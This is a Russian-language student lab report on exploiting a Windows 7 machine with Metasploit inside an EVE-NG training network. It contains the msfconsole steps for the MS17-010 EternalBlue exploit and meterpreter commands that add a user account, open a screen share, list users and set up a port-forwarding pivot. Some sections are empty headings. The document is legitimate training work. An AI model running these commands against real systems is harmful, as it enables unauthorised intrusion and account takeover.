# Практика №3. Эксплутация уязвимостей. MetaSplot Framework
# Задание к практической работе №3
- Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать)
- Настроить каждое устройство в соответсвии со следующими параметрами:
- Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP
- На PfSense выполнить проброс с внешних 445/tcp и 3389/tcp портов на аналогичные порты win-7 виртуальной машины
- Выполнить сканирование внешнего интерфейса межсетевого экрана с помощью nmap и Nessus с целью обнаружения уязвимых сервисов
- Использую Metasploit Framework - получить доступ до Windows-7 виртуальной машины
- Используя payload meterpreter:
- выполнить создание нового пользователя
- Выполнить скриншот рабочего стола
- получить все учетные записи, находящиеся в памяти системы
- Выполнить проксирование трафика во внутреннюю инфраструктуру
# **Выполнение задания**

**Debian**

**Kali**

**Windows 7**

**Сканирование nmap**
В ходе сканирования видим, что нужны нам порты открыты(445, 3389)

**Пробрасываем порты** 
**Используя Metasploit Framework, получаем доступ до Win-7**
Испсользуем эксплойт ExternalBlue
```
sudo msfconsole
search ms17-010
use 0
set target 0
set ForceExploit
set rhost 192.168.124.142 //pfsense ip
run
```

Для удаленного доступа пишем команду:
```
screenshare
```

Для создания нового пользователя:
```
run getgui -u semyon -p qwerty
```

Список пользователей:


Список пользователей
```
shell
net user
```

**Проксирование трафика во внутреннюю инфраструктуру**
ip Kali, любой порт, 443 порт по умолчанию используемый размещамым кэшем для приема входящих рпедложений контента от клиентов, ip pfsense на винде
```
portfwd add -L 192.168.124.135 -l 2280 -p 443 -r 192.168.1.1
```
